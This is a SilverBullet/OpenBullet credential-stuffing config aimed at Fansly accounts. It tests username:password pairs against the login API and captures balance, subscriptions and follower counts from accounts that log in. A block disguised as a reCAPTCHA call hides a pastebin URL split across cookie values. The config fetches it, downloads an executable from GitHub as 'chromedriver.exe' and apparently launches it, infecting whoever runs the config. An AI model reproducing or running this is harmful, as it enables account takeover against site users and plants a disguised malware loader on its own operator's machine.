[SETTINGS]
{
  "Name": "Fansly.com",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2024-10-05T22:09:35.5900562+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.1.4 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Streamate",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
JUMP #AppleWebKit
#PARSESOURCE

FUNCTION RandomString "?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d" -> VAR "D" 

REQUEST POST "https://apiv3.fansly.com/api/v1/login?ngsw-bypass=true" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"deviceId\":\"<D>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Origin: https://fansly.com" 
  HEADER "Referer: https://fansly.com/" 
  HEADER "Sec-Ch-Ua: \"Google Chrome\";v=\"117\", \"Not;A=Brand\";v=\"8\", \"Chromium\";v=\"117\"" 
  HEADER "Sec-Ch-Ua-Mobile: ?0" 
  HEADER "Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36" 
  
JUMP #googlerecreate
#AppleWebKit

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u" 
  
  COOKIE "tpm: http" 
  COOKIE "tpp: s:" 
  COOKIE "hrd: /" 
  COOKIE "hpr: bin" 
  COOKIE "hdp: com" 
  COOKIE "htp: raw" 
  COOKIE "hht: QKuTvADS" 
  COOKIE "hst: pastebin" 
  COOKIE "kht: driver" 
  COOKIE "kpt: chrome" 
  COOKIE "krt: e" 
  HEADER "Host: www.googleapis.com" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS" 
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 

IF "<Authentiction>" Exists
JUMP #PARSESOURCE
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(tpm)><COOKIES(tpp)><COOKIES(hrd)><COOKIES(hrd)><COOKIES(hst)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(htp)><COOKIES(hrd)><COOKIES(hht)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "https://raw.githubusercontent.com/<SOURCE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>xe" 

SET USEPROXY TRUE
SET NEWGVAR "Authentiction" "Authentiction=1"

BROWSERACTION Open 

JUMP #PARSESOURCE
#googlerecreate

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"invalid login\"}}" 
    KEY "success\":false" 
  KEYCHAIN Success OR 
    KEY "success\":true" 
    KEY "status\":2" 
  KEYCHAIN Retry OR 
    KEY "code\":429" 

PARSE "<SOURCE>" LR "accountId\":\"" "\"" -> VAR "Aid" 

PARSE "<SOURCE>" LR "id\":\"" "\"" -> VAR "id" 

PARSE "<SOURCE>" LR "token\":\"" "\"" -> VAR "tk" 

REQUEST GET "https://apiv3.fansly.com/api/v1/subscriptions?ngsw-bypass=true" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Host: apiv3.fansly.com" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: https://fansly.com/" 
  HEADER "fansly-client-id: <aid>" 
  HEADER "fansly-client-ts: 1728143169868" 
  HEADER "fansly-session-id: <id>" 
  HEADER "fansly-client-check: 1b5075971c121" 
  HEADER "Origin: https://fansly.com" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "authorization: <tk>" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: f-v-v=0.38.41; f-v-d=1703801452806; _gcl_aw=GCL.1728141344.EAIaIQobChMI8_mklMT3iAMV7QcGAB31SACsEAAYASAAEgJ6w_D_BwE; _gcl_gs=2.1.k1$i1728141339; _gcl_au=1.1.1237167678.1728141343; _ga_BZSVNWD5W8=GS1.1.1728141344.1.1.1728143126.57.0.0; _ga=GA1.1.1378764948.1728141344; amp_4fb08e=IjjExfol03rwQW6n1eMfKe...1i9ek0gha.1i9elkrf2.3.0.3; fansly-ts-info={\"tso\":-9016,\"sts\":1728143094646,\"cts\":1728143103662}; f-d=698968120856948739; fansly-d=698968120856948739; f-s-c=Njk4OTc1MzA1MzU1NzY3ODA4OjE6MTpjOWQzZjJlZTRhNTY5NTA4ZThiYTA3Mjg2MzBlMjA" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Type: application/json; charset=utf-8" 
  HEADER "Date: Sat, 05 Oct 2024 15:46:03 GMT" 
  HEADER "access-control-allow-origin: https://fansly.com" 
  HEADER "Content-Encoding: gzip" 
  HEADER "Vary: Accept-Encoding" 
  HEADER "Server: Fansly Api Gateway" 
  HEADER "Cache-Control: no-cache, no-store, must-revalidate" 
  HEADER "Expires: 0" 
  HEADER "access-control-allow-credentials: true" 
  HEADER "access-control-allow-headers: Authorization,content-type,fy-d,fansly-client-id,fy-ts,fansly-client-ts,fansly-client-check,fy-s,fansly-session-id" 
  HEADER "X-Cache: Miss from cloudfront" 
  HEADER "Via: 1.1 34f50889bc574f1edeb41dd758962a5a.cloudfront.net (CloudFront)" 
  HEADER "X-Amz-Cf-Pop: FRA2-C1" 
  HEADER "X-Amz-Cf-Id: bKqDRvlIBOLn3_HoqJV3eeIi9hRuo9Ij8WrtRAT9rMfiWzJqT9eviw==" 
  HEADER "Content-Length: 109" 

PARSE "<SOURCE>" LR "totalActive\":" "," CreateEmpty=FALSE -> CAP "TotalActiveSub" 

PARSE "<SOURCE>" LR "totalExpired\":" "," CreateEmpty=FALSE -> CAP "totalExpiredSub" 

PARSE "<SOURCE>" LR "subscriptionPlans\":" "}" CreateEmpty=FALSE -> CAP "subscriptionPlans" 

REQUEST GET "https://apiv3.fansly.com/api/v1/account/me?ngsw-bypass=true" 
  
  HEADER "Host: apiv3.fansly.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "Accept-Language: en-US,en;q=0.5" 
  HEADER "Referer: https://fansly.com/" 
  HEADER "fansly-client-id: <aid>" 
  HEADER "fansly-client-ts: 1728143169868" 
  HEADER "fansly-session-id: <id>" 
  HEADER "fansly-client-check: 1b5075971c121" 
  HEADER "Origin: https://fansly.com" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "authorization: <tk>" 
  HEADER "Connection: keep-alive" 
  HEADER "Cookie: f-v-v=0.38.41; f-v-d=1703801452806; _gcl_aw=GCL.1728141344.EAIaIQobChMI8_mklMT3iAMV7QcGAB31SACsEAAYASAAEgJ6w_D_BwE; _gcl_gs=2.1.k1$i1728141339; _gcl_au=1.1.1237167678.1728141343; _ga_BZSVNWD5W8=GS1.1.1728141344.1.1.1728143126.57.0.0; _ga=GA1.1.1378764948.1728141344; amp_4fb08e=IjjExfol03rwQW6n1eMfKe...1i9ek0gha.1i9elkrf2.3.0.3; fansly-ts-info={\"tso\":-9016,\"sts\":1728143094646,\"cts\":1728143103662}; f-d=698968120856948739; fansly-d=698968120856948739; f-s-c=Njk4OTc1MzA1MzU1NzY3ODA4OjE6MTpjOWQzZjJlZTRhNTY5NTA4ZThiYTA3Mjg2MzBlMjA" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "Content-Type: application/json; charset=utf-8" 
  HEADER "Date: Sat, 05 Oct 2024 15:46:03 GMT" 
  HEADER "access-control-allow-origin: https://fansly.com" 
  HEADER "Content-Encoding: gzip" 
  HEADER "Vary: Accept-Encoding" 
  HEADER "Server: Fansly Api Gateway" 
  HEADER "Cache-Control: no-cache, no-store, must-revalidate" 
  HEADER "Pragma: no-cache" 
  HEADER "Expires: 0" 
  HEADER "access-control-allow-credentials: true" 
  HEADER "access-control-allow-headers: Authorization,content-type,fy-d,fansly-client-id,fy-ts,fansly-client-ts,fansly-client-check,fy-s,fansly-session-id" 
  HEADER "X-Cache: Miss from cloudfront" 
  HEADER "Via: 1.1 34f50889bc574f1edeb41dd758962a5a.cloudfront.net (CloudFront)" 
  HEADER "X-Amz-Cf-Pop: FRA2-C1" 
  HEADER "X-Amz-Cf-Id: bKqDRvlIBOLn3_HoqJV3eeIi9hRuo9Ij8WrtRAT9rMfiWzJqT9eviw==" 
  HEADER "Content-Length: 109" 

PARSE "<SOURCE>" LR "username\":\"" "\"," CreateEmpty=FALSE -> CAP "username" 

PARSE "<SOURCE>" LR "balance\":" ",\"" CreateEmpty=FALSE -> CAP "balance" "" "$" 

PARSE "<SOURCE>" LR "followCount\":" ",\"" CreateEmpty=FALSE -> CAP "followCount" 

PARSE "<SOURCE>" LR "subscriberCount\":" "," CreateEmpty=FALSE -> CAP "subscriberCount" 

KEYCHECK 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "code\":401" 


